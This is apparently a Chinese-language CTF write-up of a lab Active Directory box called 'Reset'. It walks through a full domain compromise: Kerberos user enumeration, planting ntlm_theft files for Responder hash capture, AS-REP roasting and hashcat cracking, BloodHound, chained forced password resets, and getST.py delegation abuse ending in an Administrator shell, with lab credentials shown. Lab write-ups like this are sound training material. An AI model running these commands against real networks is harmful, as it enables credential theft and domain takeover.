看情况是个重启提权
Pasted%20image%2020240206211040

Starting Nmap 7.60 ( https://nmap.org ) at 2024-02-06 13:05 GMT
Nmap scan report for ip-10-10-57-36.eu-west-1.compute.internal (10.10.57.36)
Host is up (0.00050s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Microsoft DNS
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-02-06 13:06:31Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.corp0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: thm.corp0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=HayStack.thm.corp
| Not valid before: 2024-01-25T21:01:31
|_Not valid after:  2024-07-26T21:01:31
|_ssl-date: 2024-02-06T13:06:37+00:00; 0s from scanner time.
MAC Address: 02:93:8A:8C:6E:D3 (Unknown)
Service Info: Host: HAYSTACK; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: HAYSTACK, NetBIOS user: <unknown>, NetBIOS MAC: 02:93:8a:8c:6e:d3 (unknown)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-02-06 13:06:37
|_  start_date: 1600-12-31 23:58:45

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.71 seconds

加入到/etc/hosts

echo 10.10.57.36 HayStack.thm.corp >> /etc/hosts

enum4linux扫描smb

root@ip-10-10-149-226:~# enum4linux 10.10.57.36
WARNING: polenum.py is not in your path.  Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Feb  6 13:16:15 2024

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.57.36
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 =================================================== 
|    Enumerating Workgroup/Domain on 10.10.57.36    |
 =================================================== 
[+] Got domain/workgroup name: THM

 =========================================== 
|    Nbtstat Information for 10.10.57.36    |
 =========================================== 
Looking up status of 10.10.57.36
	HAYSTACK        <20> -         B <ACTIVE>  File Server Service
	HAYSTACK        <00> -         B <ACTIVE>  Workstation Service
	THM             <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	THM             <1c> - <GROUP> B <ACTIVE>  Domain Controllers
	THM             <1b> -         B <ACTIVE>  Domain Master Browser

	MAC Address = 02-93-8A-8C-6E-D3

 ==================================== 
|    Session Check on 10.10.57.36    |
 ==================================== 
[+] Server 10.10.57.36 allows sessions using username '', password ''

 ========================================== 
|    Getting domain SID for 10.10.57.36    |
 ========================================== 
Domain Name: THM
Domain Sid: S-1-5-21-1966530601-3185510712-10604624
[+] Host is part of a domain (not a workgroup)

 ===================================== 
|    OS information on 10.10.57.36    |
 ===================================== 
Use of uninitialized value $os_info in concatenation (.) or string at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 464.
[+] Got OS info for 10.10.57.36 from smbclient: 
[+] Got OS info for 10.10.57.36 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED

 ============================ 
|    Users on 10.10.57.36    |
 ============================ 
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED

[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED

 ======================================== 
|    Share Enumeration on 10.10.57.36    |
 ======================================== 
WARNING: The "syslog" option is deprecated
smb1cli_req_writev_submit: called for dialect[SMB3_11] server[10.10.57.36]

	Sharename       Type      Comment
	---------       ----      -------
Error returning browse list: NT_STATUS_REVISION_MISMATCH
Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.57.36 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 10.10.57.36

 =================================================== 
|    Password Policy Information for 10.10.57.36    |
 =================================================== 
[E] Dependent program "polenum.py" not present.  Skipping this check.  Download polenum from http://labs.portcullis.co.uk/application/polenum/


 ============================= 
|    Groups on 10.10.57.36    |
 ============================= 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ====================================================================== 
|    Users on 10.10.57.36 via RID cycling (RIDS: 500-550,1000-1050)    |
 ====================================================================== 
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.

 ============================================ 
|    Getting printer info for 10.10.57.36    |
 ============================================ 
Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED


enum4linux complete on Tue Feb  6 13:16:16 2024


Pasted%20image%2020240206212412

进data看看
Pasted%20image%2020240206212521

重来!跟着别人打

┌──(kali㉿kali)-[~]
└─$ nmap -Pn  -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='thm.corp',userdb=/usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt 10.10.57.36




Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-06 23:22 CST
Nmap scan report for HayStack.thm.corp (10.10.57.36)
Host is up (0.28s latency).

PORT   STATE SERVICE
88/tcp open  kerberos-sec
| krb5-enum-users: 
| Discovered Kerberos principals
|     guest@thm.corp
|_    administrator@thm.corp

Nmap done: 1 IP address (1 host up) scanned in 1.53 seconds

枚举Kerberos服务中的用户账户。

接着枚举

enum4linux -a -u "guest" 10.10.57.36

分析数据

Pasted%20image%2020240206233213

拿下来看看

Subject: Welcome to Reset -�Dear <USER>,Welcome aboard! We are thrilled to have you join our team. As discussed during the hiring process, we are sending you the necessary login information to access your company account. Please keep this information confidential and do not share it with anyone.The initial passowrd is: ResetMe123!We are confident that you will contribute significantly to our continued success. We look forward to working with you and wish you the very best in your new role.Best regards,The Reset Team

l的密码
Pasted%20image%2020240206233707

python ntlm_theft.py -g all -s 10.10.57.36 -f test
sudo responder -I tun0 -v
然后用这mput *全部传上去
因为他会定时访问这个目录里的东西,于是我们捕获他访问的时候的NTML哈希

自己没抓出来…
Passw0rd1 -> AUTOMATE

登录

p4 evil-winrm -i 10.10.57.36 -u AUTOMATE -p Passw0rd1

横向移动

AS-REProastable

Pasted%20image%2020240207003517

p4 python GetNPUsers.py thm.corp/AUTOMATE
p4 python GetNPUsers.py THM.CORP/TABATHA_BRITT 

p4 python GetNPUsers.py THM.CORP/TABATHA_BRITT 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/aarch64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[proxychains] Strict chain  ...  120.46.78.45:7777  ...  10.10.57.36:389  ...  OK
[*] Cannot authenticate TABATHA_BRITT, getting its TGT
[proxychains] Strict chain  ...  120.46.78.45:7777  ...  10.10.57.36:88  ...  OK
$krb5asrep$23$TABATHA_BRITT@THM.CORP:c92e79078f2460ed8858618a69bf490b$855851e3fd811ab0b91b9497f064d5ade3e4dca63a9b3b0008cca9f878f18a6b37d317b25ac8cef7f23b548d851983c8e623657c0fe2fad69f50c4cd8d14cb8c87c07ba692275dad6088d02c2d30f71dcf691024a007f2cc53d883b8a795d73e2dafa118d1337dc4ee0c237ce879a5ae28a0fbd4e226383b89d618698044a04ab13f76a1bc3a05f561527f08983ace529918cab15f5c0fd487e5935b0126a5f26f6e2b12ca4369e6ab93ea3ef2074f471cddc9dbb7dcfee6a221e347562fe4f1e2782e49ae23c8121ed5c7f878eb6a107dab8f971277064899b85fad3aedea2d2879ef5f

hashcat /tmp/hash /usr/share/wordlists/rockyou.txt直接让他自动识别

解出来是marlboro(1985)

雪豹

得先设置一个假的DNS代理
python dnschef.py --fakeip 10.10.57.36 --nameserver 10.10.57.36指向目标ip

python bloodhound.py -d THM.CORP -u 'TABATHA_BRITT' -p 'marlboro(1985)' -dc thm.corp -c all -ns 127.0.0.1

得到结果

难绷,直接用别人的吧,虚拟机里性能不好评价
Pasted%20image%2020240207013719

Pasted%20image%2020240207013736

p4 net rpc password "SHAWNA_BRAY" "newP@ssword2022" -U 'TABATHA_BRITT'%'marlboro(1985)' -I '10.10.57.36' -S "THM.CORP"
ai 脚本小子罢了
p4 net rpc password "CRUZ_HALL" "newP@ssword2022" -U 'SHAWNA_BRAY'%'newP@ssword2022' -I '10.10.57.36' -S "THM.CORP"

p4 net rpc password "DARLA_WINTERS" "newP@ssword2022" -U 'CRUZ_HALL'%'newP@ssword2022' -I '10.10.57.36' -S "THM.CORP"

用A->B->C
Pasted%20image%2020240207014505
看不懂

Pasted%20image%2020240207014515
我只知道要用
getST.py

sudo python getST.py -k -impersonate Administrator -spn cifs/HAYSTACK.THM.CORP THM.CORP/DARLA_WINTERS
export KRB5CCNAME=Administrator.ccache
python  /opt/impacket/examples/wmiexec.py THM.CORP/Administrator@THM.CORP -k -no-pass

这时候域名又要换回HAYSTACK.THM.CORP

太帅了,回味一下

nmap->枚举->smb->发现文件规律->上传ntml-theft偷hash->解密登录->flag1->AS-REProastable->GetNPUsers.py->爆破第二个密码->fakedns->第二个分析雪豹->改密码->第三个登录->getST提权->root